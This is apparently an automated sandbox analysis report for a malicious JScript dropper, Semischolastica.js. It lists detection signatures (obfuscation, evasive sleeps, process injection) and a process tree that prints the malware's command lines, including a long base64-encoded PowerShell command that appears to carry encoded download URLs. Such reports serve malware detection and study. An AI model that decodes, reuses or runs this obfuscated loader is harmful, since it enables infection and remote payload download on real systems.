Edit tour
Windows
Analysis Report
Semischolastica.js
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Classification
- System is w10x64
- wscript.exe (PID: 5812 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Semis cholastica .js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - wscript.exe (PID: 6660 cmdline:
"C:\Window s\System32 \wscript.e xe" "C:\Pr ogramData\ WeigelasSc ribbleable .js" Proto pathicCosm ographical ly pachisi sCounterpr oductivene ss Knowing estGemmer theoretici anRoundish ness MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6908 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - encodedcom mand "JABh AHYAYQBuAH QAbABhAHkA IAA9ACAAIg BhAEEAQgAw AEEASABRAE EAYwBBAEIA egBBAEQAbw BBAEwAdwBB AHYAQQBHAE 0AQQBiAHcA QgB5AEEARw A0AEEAYQBR AEIAbQBBAE cAawBBAFkA dwBBAHUAQQ BHAE0AQQBZ AFEAQgB6AE EARwBFAEEA YQBuAG4AcA BhAEEAQgAw AEEASABRAE EAYwBBAEIA egBBAEQAbw BBAEwAdwBB AHYAQQBEAF kAQQBNAHcA QQB1AEEARA BJAEEATgBR AEEAdwBBAE MANABBAE0A UQBBADIAQQ BEAGsAQQBM AGcAQQAxAE EARABjAEEA YQBuAG4AcA BhAEEAQgAw AEEASABRAE EAYwBBAEIA egBBAEQAbw BBAEwAdwBB AHYAQQBGAE kAQQBZAFEA QgAxAEEARw A0AEEAWQB3 AEIAbwBBAE cAawBBAFoA UQBCAHkAQQ BDADQAQQBa AHcAQgBoAE EARwAwAEEA WgBRAEIAeg BBAEEAPQA9 AGEAbgBuAH AAYQBBAEIA MABBAEgAUQ BBAGMAQQBC AHoAQQBEAG 8AQQBMAHcA QQB2AEEARA BjAEEATQB3 AEEAdQBBAE QAWQBBAE0A dwBBAHUAQQ BEAFEAQQBO AGcAQQB1AE EARABFAEEA TQB3AEEANQ BBAEEAPQA9 ACIAOwAkAG YAbABlAHQA YwBoAGUAcw AgAD0AIAAi AGEAQQBCAD AAQQBIAFEA QQBjAEEAQg B6AEEARABv AEEATAB3AE EAdgBBAEYA YwBBAGIAdw BCAGgAQQBH AFEAQQBaAF EAQgB5AEEA RgBBAEEAYQ BBAEIAaABB AEcANABBAF oAUQBCAHkA QQBHADgAQQ BaAHcAQgBo AEEARwAwAE EAYQBRAEIA aABBAEMANA BBAGIAQQBC AHAAQQBHAD QAQQBhAHcA QQA9ACIAOw AkAFEAdQBp AHoAegBlAG UARABlAGMA ZQBsAGUAcg BvAG0AZQB0 AGUAcgAgAD 0AIAAiAGEA QQBCADAAQQ BIAFEAQQBj AEEAQQA2AE EAQwA4AEEA TAB3AEEAeA BBAEQARQBB AE4AUQBBAH UAQQBEAEUA QQBOAGcAQQ A0AEEAQwA0 AEEATgBnAE EAegBBAEMA NABBAE0AZw BBAHgAQQBE AE0AQQAiAD sAJABpAG0A bQBhAHIAYw BlAHMAYwBp AGIAbABlAC AAPQAgACIA YQBBAEIAMA BBAEgAUQBB AGMAQQBBAD YAQQBDADgA QQBMAHcAQQ B4AEEARABV AEEATQBRAE EAdQBBAEQA RQBBAE0AUQ BBADMAQQBD ADQAQQBNAF EAQQAxAEEA RABVAEEATA BnAEEAMwBB AEQAUQBBAE wAdwBCADYA QQBFAFEAQQ BNAGcAQgBr AEEARQBJAE EATAB3AEIA MwBBAEQAUQ BBAFQAUQBB AD0AUQBhAE EAQgAwAEEA SABRAEEAYw BBAEEANgBB AEMAOABBAE wAdwBBAHgA QQBEAGsAQQ BNAEEAQQB1 AEEARABrAE EATgB3AEEA dQBBAEQARQ BBAE0AdwBB ADIAQQBDAD QAQQBOAEEA QQAxAEEAQw A4AEEAVABn AEIATgBBAE UASQBBAFQA QQBBAHYAQQ BHAEUAQQBS AFEAQgA1AE EARQA0AEEA YgB3AEEAPQ BRAGEAQQBC ADAAQQBIAF EAQQBjAEEA QQA2AEEAQw A4AEEATAB3 AEEANABBAE QAawBBAEwA ZwBBADQAQQ BEAEkAQQBM AGcAQQAxAE EARABJAEEA TABnAEEAMg BBAEQAVQBB AEwAdwBBAH kAQQBHAFkA QQBMAHcAQg BUAEEAQQA9 AD0AUQBhAE EAQgAwAEEA SABRAEEAYw BBAEEANgBB AEMAOABBAE wAdwBBAHgA QQBEAGsAQQ BNAGcAQQB1 AEEARABFAE EATQBnAEEA eABBAEMANA BBAE0AZwBB AHoAQQBDAD QAQQBNAFEA QQB3AEEARA BRAEEATAB3 AEIAVQBBAE UAdwBBAFIA dwBCAG8AQQ BFADQAQQBa AEEAQQB2AE EARQB3AEEA WgBBAEIAWA BBAEcAUQBB AFIAQQBCAE cAQQBBAD0A PQBRAGEAQQ BCADAAQQBI AFEAQQBjAE EAQQA2AEEA QwA4AEEATA B3AEEAeABB AEQAawBBAE 0AZwBBAHUA QQBEAEUAQQ BNAGcAQQB4 AEEAQwA0AE EATQBnAEEA egBBAEMANA BBAE4AZwBB AHgAQQBDAD gAQQBPAFEA QgBoAEEARA BZAEEATgB3 AEIAdwBBAE cAVQBBAGMA dwBBAHYAQQ BIAGcAQQBh AEEAQgBaAE EASABnAEEA ZABBAEIAUg BBAEQAQQBB AFMAUQBBAD 0AUQBhAEEA